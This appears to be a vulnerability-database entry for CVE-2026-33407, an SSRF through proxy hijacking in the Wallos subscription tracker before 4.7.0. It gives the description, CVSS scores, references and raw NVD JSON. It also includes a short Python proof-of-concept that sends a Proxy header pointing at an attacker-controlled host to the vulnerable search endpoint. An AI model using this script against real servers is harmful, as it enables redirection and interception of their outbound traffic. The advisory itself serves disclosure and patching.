CVE-2026-33407

Description

Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.7.0, Wallos endpoints/logos/search.php accepts HTTP_PROXY and HTTPS_PROXY environment variables without validation, enabling SSRF via proxy hijacking. The server performs DNS resolution on user-supplied search terms, which can be controlled by attackers to trigger outbound requests to arbitrary domains. This issue has been patched in version 4.7.0.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:wallosapp:wallos:*:*:*:*:*:*:*:* - VULNERABLE

Wallos < 4.7.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable Wallos instance
target_url = "http://<target-ip>/endpoints/logos/search.php"

# The vulnerability allows setting the proxy via environment variables.
# In many CGI/FPM setups, the 'Proxy' header sets the HTTP_PROXY env var.
headers = {
    "Proxy": "http://<attacker-controlled-ip>:8080"
}

# The server performs DNS resolution on the search term.
data = {
    "search": "example.com"
}

try:
    response = requests.post(target_url, headers=headers, data=data)
    print(f"Status Code: {response.status_code}")
    print("If the server resolves 'example.com' via the attacker's proxy, the exploit is successful.")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33407
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33407
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33407/
[4] VulDB https://vuldb.com/cve/CVE-2026-33407
[5] https://github.com/ellite/Wallos/commit/e87387f0ebb540cd33e6dfda7181db9db650ecef#diff-d77202c5d47a3d7d4586e519f6f5e256da5fb2969fa8b9c75c399b2821e9de40
[6] https://github.com/ellite/Wallos/security/advisories/GHSA-hhjq-82f8-m6rc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33407", "sourceIdentifier": "[email protected]", "published": "2026-03-24T18:16:11.627", "lastModified": "2026-03-26T20:54:06.227", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.7.0, Wallos endpoints/logos/search.php accepts HTTP_PROXY and HTTPS_PROXY environment variables without validation, enabling SSRF via proxy hijacking. The server performs DNS resolution on user-supplied search terms, which can be controlled by attackers to trigger outbound requests to arbitrary domains. This issue has been patched in version 4.7.0."}, {"lang": "es", "value": "Wallos es un rastreador de suscripciones personal de código abierto y autoalojable. Antes de la versión 4.7.0, el endpoint de Wallos /logos/search.PHP acepta las variables de entorno HTTP_PROXY y HTTPS_PROXY sin validación, lo que permite SSRF a través del secuestro de proxy. El servidor realiza la resolución DNS en los términos de búsqueda proporcionados por el usuario, que pueden ser controlados por atacantes para activar solicitudes salientes a dominios arbitrarios. Este problema ha sido parcheado en la versión 4.7.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}, {"lang": "en", "value": "CWE-922"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wallosapp:wallos:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.7.0", "matchCriteriaId": "7376DD5F-C93E-4454-810B-DE04B2DE7032"}]}]}], "references": [{"url": "https://github.com/ellite/Wallos/commit/e87387f0ebb540cd33e6dfda7181db9db650ecef#diff-d77202c5d47a3d7d4586e519f6f5e256da5fb2969fa8b9c75c399b2821e9de40", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ellite/Wallos/security/advisories/GHSA-hhjq-82f8-m6rc", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}